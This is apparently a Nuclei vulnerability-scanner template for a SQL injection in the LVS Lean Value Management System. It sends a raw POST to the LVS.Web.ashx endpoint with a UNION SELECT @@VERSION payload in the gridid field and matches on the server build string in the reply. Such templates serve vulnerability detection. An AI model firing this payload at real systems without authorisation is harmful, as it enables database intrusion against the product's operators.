id: LVS-Webashx-sql

info:
  name: LVS精益价值管理系统  LVS.Web.ashx SQL注入漏洞
  author: unknown
  severity: high
  description: LVS精益价值管理系统  LVS.Web.ashx存在SQL注入漏洞
  tags: sql injection
  
http:
  - raw:
      - |
        POST /ajax/LVS.Web.AgencytaskList,LVS.Web.ashx?_method=GetColumnIndex&_session=r HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain; charset=UTF-8

        src=AgencytaskList
        gridid=1' UNION ALL SELECT @@VERSION--
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<X64> (Build'
      - type: status
        status: 
          - 200





